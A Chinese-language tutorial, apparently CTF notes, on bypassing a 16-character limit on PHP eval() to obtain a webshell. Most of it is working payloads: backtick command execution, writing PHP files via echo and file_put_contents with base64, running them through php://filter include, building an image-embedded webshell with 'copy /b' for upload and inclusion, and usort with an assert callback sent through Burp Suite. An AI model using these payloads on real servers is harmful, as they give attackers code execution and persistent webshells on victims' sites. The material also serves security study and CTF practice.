EVAL长度限制突破方法
<?php
$param = $_REQUEST['param'];
If (strlen($param) < 17 && stripos($param, 'eval') === false && stripos($param, 'assert') === false) //长度小于17,没有eval和assert关键字
{
eval($param);
}
//stripos --- 查找字符串首次出现的位置(不区分大小写)
eval函数参数限制在16个字符的情况下,如何拿到Webshell?
`$_GET[1]'
相似答案:
exec($_GET[1]); linux下反引号可以执行命令
?param=echo $_GET[0];&0=id
那么就可以写一些内容到一些文件里去
再访问一下
param=echo%20$_GET[0];&0=param=echo $_GET[0];&0=echo '<?php phpinfo();' > a.php
写入成功
也可以使用base64编码写入:echo PD9waHAgcGhwaW5mbygpOw | base64 -d > aa.php
param=$_GET1;
php
param=$_GET[1](N,P,8); &1=file_put_contents //file_put_contents将数据写入文件
......
最后把PD9waHAgcGhwaW5mbygpOw写进文件N。
那怎么解码执行呢?
param=include$_GET[1];&1=php://filter/read=convert.base64-decode/resource=N
read读取N里面的内容进行base64解码。虽然N不是php文件,但是文件包含可以把任意一个文件里面的php代码执行起来
php:// --- 访问各个输入/输出流(I/O streams)
php://filter是一种元封装器, 设计用于数据流打开时的筛选过滤应用。(可用的过滤器:字符串过滤器、转换过滤器、压缩过滤器、加密过滤器)
这里用转换过滤器:convert.base64-encode 和 convert.base64-decode。使用这两个过滤器等同于分别用 base64_encode() 和 base64_decode() 函数处理所有的流数据。文件包含
找一张普通图片
写一个php文件
copy /b 001.png + web.php /a web.jpg----------/b → 表示以二进制模式处理 001.png
+ → 表示合并文件。
web.php→ 第二个文件。
/a→ 表示以 ASCII 文本模式 处理 web.php。
web.jpg → 最终输出的文件名。
web.jpg可以正常打开看到图片,使用记事本打开图片,可以在文件的最后看到写入的php代码。
很多网站都有上传图片的功能(上传头像等),上传之后检查代码就可以看到上传的路径,用include_$GET['文件路径']就可以了。
文件包含可以把任意一个文件里面的php代码执行起来
usort(...$_GET);
?1[]=test&1[]=phpinfo();&2=assert在windows上访问
使用BurpSuite抓包
抓到之后发送给Repeater,然后转换为POST
在php的整体运行流程中允许POST和GET同步执行
(...$_GET(变长参数))把1[]=test&1[]=phpinfo();&2=assert接过来了,然后就放到usort中,一个数组,一个回调函数。
发送
